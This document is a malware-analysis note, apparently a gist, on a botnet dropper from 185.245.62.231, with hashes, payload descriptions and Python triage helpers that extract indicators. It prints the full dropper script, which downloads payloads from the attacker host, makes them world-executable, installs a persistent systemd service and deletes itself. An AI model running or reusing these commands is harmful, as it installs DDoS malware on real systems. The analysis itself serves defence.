@dlee35
Last active March 6, 2022 17:59
Attack Observation Four - Notes (185.245.62.231)

IP info:

ip: "185.245.62.231",
city: "Frankfurt am Main",
org: "AS200303 Jan Philipp Waldecker trading as LUMASERV Systems",
postal: "60306",
timezone: "Europe/Berlin"

test.sh (f0869b01daa7d4ca611de720e87a8423c5ab03b194d4dfe92b54302a7ee74ceb):

#!/bin/sh
apt-get -y install python3;
apt-get -y install nodejs;
cd /etc/;
wget hxxp://185.245.62.231/x1;
wget hxxp://185.245.62.231/v1.py;
wget hxxp://185.245.62.231/g1.js;
wget hxxp://185.245.62.231/s1;
wget hxxp://185.245.62.231/p1.txt;
chmod 777 x1;
chmod 777 v1.py;
chmod 777 g1.js;
chmod 777 s1;
chmod 777 p1.txt;
printf "[Unit]\nDescription=System\n[Service]\nExecStart=/usr/bin/python3 /etc/v1.py\n[Install]\nWantedBy=multi-user.target\n" > /etc/systemd/system/hosting.service;
systemctl enable hosting;
systemctl start hosting;
rm -r /etc/test.sh;
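The dropper above is a flat, one-command-per-line script, so its indicators (download URLs, dropped paths, the systemd unit it writes, the service it enables, what it deletes) can be pulled out mechanically rather than by hand. The following is an added triage helper written for these notes, not code from the gist or from the sample; it embeds a transcription of test.sh (URLs kept defanged as hxxp://), tracks `cd` to resolve relative operands, decodes the `\n` escapes in the printf'd unit file, and then lists the things an analyst would go and check on a suspect host. The world-writable-bits heuristic and the "persistence" wording are my own choices.

```python
import posixpath
import re

# Transcription of the observed test.sh (URLs left defanged as hxxp://).
DROPPER = r"""#!/bin/sh
apt-get -y install python3;
apt-get -y install nodejs;
cd /etc/;
wget hxxp://185.245.62.231/x1;
wget hxxp://185.245.62.231/v1.py;
wget hxxp://185.245.62.231/g1.js;
wget hxxp://185.245.62.231/s1;
wget hxxp://185.245.62.231/p1.txt;
chmod 777 x1;
chmod 777 v1.py;
chmod 777 g1.js;
chmod 777 s1;
chmod 777 p1.txt;
printf "[Unit]\nDescription=System\n[Service]\nExecStart=/usr/bin/python3 /etc/v1.py\n[Install]\nWantedBy=multi-user.target\n" > /etc/systemd/system/hosting.service;
systemctl enable hosting;
systemctl start hosting;
rm -r /etc/test.sh;
"""

URL_RE = re.compile(r'\bh(?:xx|tt)ps?://[^\s"\';]+')          # defanged or live URLs
PRINTF_RE = re.compile(r'^printf\s+"(.*)"\s*>\s*(\S+)$')       # printf "..." > file
UNIT_KV_RE = re.compile(r'^(\w+)=(.*)$', re.M)                  # Key=Value lines of a unit


def _resolve(cwd, path):
    """Turn a relative operand into an absolute path using the tracked cwd."""
    return posixpath.normpath(path if path.startswith("/") else posixpath.join(cwd, path))


def extract_iocs(script):
    """Walk a flat dropper script and collect the host/network indicators it leaves behind."""
    iocs = {"urls": [], "dropped_files": [], "chmod": [], "unit_path": None,
            "unit": {}, "services": [], "deleted": []}
    cwd = "/"
    for raw in script.splitlines():
        line = raw.strip().rstrip(";").strip()
        if not line or line.startswith("#"):
            continue
        iocs["urls"].extend(URL_RE.findall(line))
        m = PRINTF_RE.match(line)
        if m:  # unit file written via printf: undo the \n escapes, then parse Key=Value pairs
            iocs["unit_path"] = m.group(2)
            iocs["unit"] = dict(UNIT_KV_RE.findall(m.group(1).replace("\\n", "\n")))
            continue
        argv = line.split()
        cmd = argv[0]
        if cmd == "cd" and len(argv) > 1:
            cwd = _resolve(cwd, argv[1])
        elif cmd == "wget":  # wget saves under the URL's basename in the current directory
            name = posixpath.basename(argv[-1].split("?", 1)[0])
            iocs["dropped_files"].append(_resolve(cwd, name))
        elif cmd == "chmod" and len(argv) > 2:
            iocs["chmod"].append((argv[1], _resolve(cwd, argv[2])))
        elif cmd == "systemctl" and len(argv) > 2 and argv[1] in ("enable", "start"):
            if argv[2] not in iocs["services"]:
                iocs["services"].append(argv[2])
        elif cmd == "rm":
            iocs["deleted"].extend(_resolve(cwd, a) for a in argv[1:] if not a.startswith("-"))
    return iocs


def triage(iocs):
    """Findings an analyst would verify on a host suspected of running this dropper."""
    findings = []
    unit = iocs["unit"]
    exec_start = unit.get("ExecStart", "")
    if iocs["unit_path"] and iocs["unit_path"].startswith("/etc/systemd/system/"):
        findings.append("persistence: unit %s (Description=%r) runs %r"
                        % (iocs["unit_path"], unit.get("Description"), exec_start))
    for path in iocs["dropped_files"]:
        if path in exec_start:
            findings.append("payload: %s is launched by the unit" % path)
    for mode, path in iocs["chmod"]:
        if mode.endswith("7"):  # heuristic: 'others' get rwx, i.e. world-writable and executable
            findings.append("weak perms: chmod %s %s" % (mode, path))
    if iocs["deleted"]:
        findings.append("anti-forensics: deletes %s" % ", ".join(iocs["deleted"]))
    return findings


if __name__ == "__main__":
    for finding in triage(extract_iocs(DROPPER)):
        print(finding)
```

On a live host the same list translates directly into checks: `systemctl cat hosting`, `ls -l /etc/x1 /etc/v1.py /etc/g1.js /etc/s1 /etc/p1.txt`, and the absence of /etc/test.sh despite the unit pointing into /etc.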

g1.js (5a5617cffae3b052f632a5be52190cdb):
- connection script with list of useragents to randomly cycle through
p1.txt (39e254dbab7a6031f11524547fb5b6f1):
- list of 951 ip addresses and ports in colon-separated format
- ex: 5.180.130.90:80
- typically HTTP-related ports (e.g., 80, 8000, 8080), but also some ephemeral/high ports (e.g., 17471, 17980, 55507)
v1.py (aa41d0d0c9d7709d86527f972131415b):
- python script referenced as hosting.service in test.sh
- heavily obfuscated using the AtShai service (see below)
s1 (434ed30938bef3099217f8c00c62fb77):
- VT first submission 2022-03-05 03:37:52 UTC
- https://www.virustotal.com/gui/file/cefe44a4efdea412a70d6568096476476d00e925a6908b45cc0b4d6c36971126
x1 (781aa9e40ef59f3526e7f89d13b4e4e8):
- VT first submission 2022-03-05 03:37:52 UTC
- https://www.virustotal.com/gui/file/9aaa130eaaedcd4bba0b0056a5feff4b967fc88bc3d457be8b8b2f0309965c6f/details
- many strings align with the following C code: https://github.com/isdrupter/busybotnet/blob/master/miscutils/udpspoof.c
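For the p1.txt target list noted above (951 entries in ip:port form), a small parser makes the port distribution and any malformed entries visible at a glance. The following is an added example written for these notes, not something shipped with the sample; the input is a constructed stand-in in the same layout (only 5.180.130.90:80 is taken from the note, the rest use RFC 5737 documentation addresses and include two deliberately bad lines), and the set of ports treated as "HTTP-related" is my own assumption.

```python
import ipaddress
from collections import Counter

# Constructed sample in the p1.txt layout. Only 5.180.130.90:80 comes from the note above;
# the other entries are RFC 5737 documentation addresses, plus two deliberately bad lines.
SAMPLE = """5.180.130.90:80
203.0.113.10:8080
203.0.113.11:8000
198.51.100.7:17471
198.51.100.8:55507
192.0.2.5:80

not-an-ip:80
203.0.113.12:99999
"""

# Assumption for bucketing: ports an analyst would lump together as "HTTP-related".
HTTP_PORTS = {80, 443, 8000, 8080, 8443, 8888}


def parse_targets(text):
    """Parse ip:port lines; return (accepted [(ip, port)], rejected [(lineno, line)])."""
    accepted, rejected = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        host, _, port_s = line.rpartition(":")
        try:
            addr = ipaddress.ip_address(host.strip("[]"))  # also tolerates [v6]:port
            port = int(port_s)
            if not 0 < port < 65536:
                raise ValueError("port out of range")
        except ValueError:
            rejected.append((lineno, line))
            continue
        accepted.append((str(addr), port))
    return accepted, rejected


def summarize(targets):
    """Tally what the list points at: distinct hosts, port distribution, HTTP vs other."""
    ports = Counter(p for _, p in targets)
    buckets = Counter("http" if p in HTTP_PORTS else "other" for _, p in targets)
    return {
        "entries": len(targets),
        "hosts": len({h for h, _ in targets}),
        "top_ports": ports.most_common(5),
        "buckets": dict(buckets),
    }


if __name__ == "__main__":
    targets, rejects = parse_targets(SAMPLE)
    print(summarize(targets))
    for lineno, line in rejects:
        print("rejected line %d: %r" % (lineno, line))
```

Run it against the real p1.txt by replacing SAMPLE with the file contents; the rejected list is worth keeping, since stray entries in an attacker's target file are often the most interesting ones.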

AtShai:
- obfuscation as a service (OaaS?)
- https://www.youtube.com/channel/UCdjncPtlh39boMqFrGx_yxw
- https://atshai.com/python-obfuscator-obfuscating-python-scripts.php
- https://www.enscrypt.io/python-pricing-table-online-popular.php
